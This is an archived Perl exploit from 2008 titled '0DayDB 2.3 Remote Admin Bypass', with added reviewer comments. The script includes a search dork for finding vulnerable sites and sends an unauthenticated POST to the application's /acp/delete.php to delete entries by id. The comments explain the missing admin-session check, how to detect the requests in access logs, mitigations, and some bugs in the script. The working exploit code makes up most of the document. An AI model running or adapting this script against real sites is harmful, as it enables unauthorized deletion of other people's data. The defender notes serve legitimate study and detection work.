
# Title : 0DayDB 2.3 (delete id) Remote Admin Bypass Exploit
# Published : 2008-01-11
# Author : Pr0metheuS


#!/usr/bin/perl
#Author : Pr0metheuS
#Script : 0DayDB v2.3
#Version : v2.3
#Dork : "Powered By 0DayDB v2.3"
#Gr33tz-Team.org
use LWP::UserAgent;
# Argument handling. The script expects exactly three command-line values,
# named <site>, <path> and <id> in the usage text (the ID of the download
# entry to delete).
# When the argument count is wrong only the usage banner is printed: there is
# no exit/die in this branch, so execution continues to the assignment below
# and to the con() call at the end of the script with whatever @ARGV holds.
# NOTE(review): every string here ends in a literal "n" - presumably "\n"
# whose backslash was lost when the listing was archived; as written no
# newline is emitted.
if(@ARGV!=3){
	print "*****************n";
	print "0DayDB v2.3 Remote Admin Bypassn";
    print "perl $0 <site> <path> <id>n";
    print "downloads ID for deleten";
    print "*****************n";
}
# The three values are stored in package globals (no `my`, and the file does
# not enable strict), which is how con() reads them. They are used as given:
# nothing here validates or normalises the URL parts or the id.
($site,$path,$id)=@ARGV;
sub pri {
    # Success banner, written to STDOUT in one print call. con() invokes this
    # when the HTTP response status is a success code; nothing here checks
    # what the server actually did with the request.
    # The first two strings end in a literal "n", reproduced as found.
    my @banner_parts = (
        "*****************n",
        "[+] Exploit completedn",
        "*****************",
    );
    print @banner_parts;
}
# Sends the one HTTP request this proof of concept consists of: a POST to
# <site><path>/acp/delete.php with the form body "id=<id>". No cookie,
# session token or credential is attached anywhere in this sub.
#
# Root cause, as far as the page shows: the advisory title calls this an
# admin bypass, so the admin-panel script presumably performs the delete
# without first checking that the caller holds an authenticated admin
# session (server-side code is not shown here - confirm against the
# application source).
#
# Defender notes:
#  - Detection: look in web-server access logs for POST requests to
#    */acp/delete.php that arrive without a session cookie or with no
#    preceding admin login from the same client.
#  - Mitigation: every script under acp/ should verify the admin session
#    before acting, state-changing requests should carry an anti-CSRF token,
#    and the acp/ directory can additionally be restricted at the web-server
#    level (authentication or source-address rules).
sub con {
# Indirect-object constructor call; creates a first user-agent object.
$ua = new LWP::UserAgent;
# Sets the User-Agent header value on that first object only.
$ua->agent("Mozilla/8.0");
# Replaces $ua with a fresh object, so the agent string set above is
# discarded and the request goes out with LWP's default User-Agent
# ("libwww-perl/<version>"). That header is trivially changed by a client,
# so it is a weak indicator on its own; key detections on the request path
# and the missing session instead.
$ua = LWP::UserAgent->new;
# Target URL is plain concatenation of the two command-line values plus the
# fixed admin-panel path.
my $req = HTTP::Request->new(POST => "".$site."".$path."/acp/delete.php");
$req->content_type('application/x-www-form-urlencoded');
# The id is appended to the body as given, without URL-encoding.
$req->content("id=".$id."");
# $res is a package global, like $ua.
$res = $ua->request($req);
# is_success is true for any 2xx status. It reports that the server answered
# successfully, not that a record was deleted, so the banner printed by pri()
# is not confirmation of the outcome. Non-2xx responses are silently ignored.
if ($res->is_success) {
	pri();
}
}
# Script entry point. The call is unconditional, so the request is also
# issued after the usage banner has been printed for a wrong argument count.
con();
